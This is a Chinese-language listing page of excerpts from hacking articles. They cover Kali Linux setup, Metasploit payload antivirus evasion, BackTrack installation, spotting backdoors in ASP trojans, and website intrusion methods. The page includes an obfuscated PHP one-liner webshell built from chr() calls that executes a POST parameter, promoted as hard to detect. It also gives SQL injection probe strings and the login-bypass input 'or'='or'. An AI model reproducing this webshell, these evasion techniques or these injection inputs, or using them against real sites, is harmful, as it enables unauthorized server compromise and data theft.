提高挖洞效率的一些工具

玩转渗透神器Kali：Kali Linux使用的正确姿势

Kali Linux 前身是著名渗透测试系统BackTrack ，是一个基于 Debian 的 Linux 发行版，包含很多安全和取证方面的相关工具。

本文假设你在新装好的kali linux环境下…命令之前的说明带#的,表示需要root权限执行,带$的,表示普通用户权限。

#安装好Kali后为系统添加一个新用户,建议设置密码和root的一样,以后默认都用这个用户登录系统,需要执行一次性的高权限命令时用sudo,执行一系列高权限命令时用su -。

useradd -m -G video,audio,cdrom,sudo ...

一个隐藏性很强的免杀pHp一句话

• 摘要:?php $a=range(1,200);$b=chr($a[96-1+1]).chr($a[114-1+1]).chr($a[114-1+1]).chr($a[100-1+1]).chr($a[113-1+1]).chr($a[115-1+1]); $b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]); ? 一个隐藏性很强的pHp一句话 $a=r
• 
  
•  

使用shellcode打造MSF免杀payload

0x00 前言
    经常有同学提及MSF payload的免杀问题，其实除了Veil之处，还有另一种比较轻巧的方案可以打造免杀的payload，那就是shellcode。
0x01 从哪里开始
    shellcode是什么，可以去drops搜索学习，但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能，接下来我们就拿最常用的payload：reverse_tcp来做测试吧！（其它的payload均可以）
CobaltStrike:payload>windows>meterpreter>...

安装backtrack5详细教程

困扰了自己多天的bt5 r3 KDE版，终于在自己的努力下安装在了VMware上，也成功的汉化了，现在，就把自己的安装过程写下来，希望可以帮到需要的朋友们。首先是准备工作，把 BT5的安装镜像下载下来，并且进行MD5校对，网络上现在有很多的版本，我用的是BT5官方网站（ http://www.） 上下载的，下载下来大概有3个多G的样子；然后是准备汉化菜单文件，众所周知，BT5汉化成功后，只是系统默认语言上的汉化，并非是所有的包括工具的汉 化，所以就需要用的我事先准备好的脚本了，准备好之后，就开始安装了。1、打开虚拟机（我用的是VMware 9.0.1汉化版...

asp木马上留后门的检测和原理

• 通常加了后门的为了隐秘性，都会加密！所以首先我们要先解密asp木马解密工具
•  
•  
• 解密后先检查有无万能密码，也就是说就算你改了木马的密码，他也能用这个密码来登录
•  
• 正常的：
•  
• EnD fUNCtION
• IF SEssIoN('web2a2dmin')<>UsERpaSs thEn
• IF requeSt.FoRM('pass')<>'' TheN
• iF REquesT.foRM('pass')=uSERPASS...

19种 网站入侵方法

1，〓经典注入〓

通常，判断一个网站是否存在注入点，可以用’，and 1=1 ,and 1=2,+and+1=1,+and+1=2,%20and%201=1,%20and%201=2,来判断，如果and 1=1正常返回页面，1=2错误，或者找不到，那么就存在注入点

2，〓万能密码OR漏洞〓

万能密码'or'='or',可以用在后台管理输入，有的网站由于没有过滤OR漏洞，输入OR直接就可以突破，一般漏洞存在于ASP类型的网站

3，〓爆库〓

爆库，可以理解为爆出数据库下载，用爆库之类的工具可以直接就获得管理员用户和密码，%5C为十六进制的\符号，而数据库大于5.0就可以进行爆库，如在PHP手工高级...